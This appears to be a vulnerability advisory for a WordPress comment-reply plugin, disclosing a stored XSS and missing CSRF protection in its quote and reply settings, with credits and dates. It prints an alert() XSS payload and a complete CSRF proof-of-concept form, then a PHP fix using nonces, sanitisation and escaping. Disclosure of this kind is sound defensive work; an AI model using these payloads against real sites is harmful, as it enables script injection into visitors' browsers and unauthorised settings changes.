The plugin does not perform any CSRF check when saving its settings, nor does it sanitise or escape its 'Quote String' and 'Reply String' settings before outputting them in comments, leading to a Stored Cross-Site Scripting issue.
Put the following payload in the 'Quote String' or 'Reply String' settings of the plugin, then view a frontend page where there is a comment to trigger the XSS:

<script>alert(/XSS/)</script>

Via CSRF:

<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=jqr2c.php" method="POST">
<input type="hidden" name="jqr2c_reply" value="Reply<script>alert(/Reply/)</script>" />
<input type="hidden" name="jqr2c_quote" value="Quote<script>alert(/Quote/)</script>" />
<input type="hidden" name="jqr2c_usephp" value="1" />
<input type="hidden" name="jqr2c_position" value="bottom" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
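The fix for both issues on the defender's side, as an added PHP example that is not the plugin's own code: a nonce check on save (which rejects the cross-site form above), sanitisation of the two option values, and escaping at the point of output. The jqr2c_example_ function names, the settings-page wiring and the markup wrapped around the strings are assumptions; only the option names and the settings page URL come from the advisory.

```php
<?php
// Settings page handler (hypothetical wiring): saves on POST, then renders the form.
function jqr2c_example_settings_page() {
    if ( isset( $_POST['jqr2c_quote'], $_POST['jqr2c_reply'] ) ) {
        jqr2c_example_save_settings();
    }
    jqr2c_example_settings_form();
}

// Save path: capability check, then nonce verification. check_admin_referer() dies
// unless the POST carries a nonce minted for 'jqr2c_save_settings' by this site,
// which an attacker's cross-site form cannot supply. Values are sanitised before
// they are stored, so no markup reaches the database.
function jqr2c_example_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    check_admin_referer( 'jqr2c_save_settings' );

    $quote = sanitize_text_field( wp_unslash( $_POST['jqr2c_quote'] ?? '' ) );
    $reply = sanitize_text_field( wp_unslash( $_POST['jqr2c_reply'] ?? '' ) );
    update_option( 'jqr2c_quote', $quote );
    update_option( 'jqr2c_reply', $reply );
}

// Settings form: emits the nonce field the save path verifies, and escapes the
// stored values when repopulating the inputs (attribute context).
function jqr2c_example_settings_form() {
    $action = admin_url( 'options-general.php?page=jqr2c.php' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'jqr2c_save_settings' );
    echo '<input type="text" name="jqr2c_quote" value="' . esc_attr( get_option( 'jqr2c_quote', '' ) ) . '" />';
    echo '<input type="text" name="jqr2c_reply" value="' . esc_attr( get_option( 'jqr2c_reply', '' ) ) . '" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}

// Output path: escape at the point of use (HTML text context) so a stored string
// can never become script, even if an older, unsanitised value is still in the DB.
function jqr2c_example_append_strings( $text ) {
    $quote = esc_html( get_option( 'jqr2c_quote', 'Quote' ) );
    $reply = esc_html( get_option( 'jqr2c_reply', 'Reply' ) );
    return $text . '<p class="jqr2c-links"><span>' . $quote . '</span> <span>' . $reply . '</span></p>';
}
add_filter( 'comment_text', 'jqr2c_example_append_strings' );
```

Escaping on output is the control that actually closes the XSS; sanitising on save and the nonce are defence in depth, since an attacker who can already submit the settings form still cannot store executable markup.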
Prashant Karman Patel
Yes
2021-09-21
2022-04-09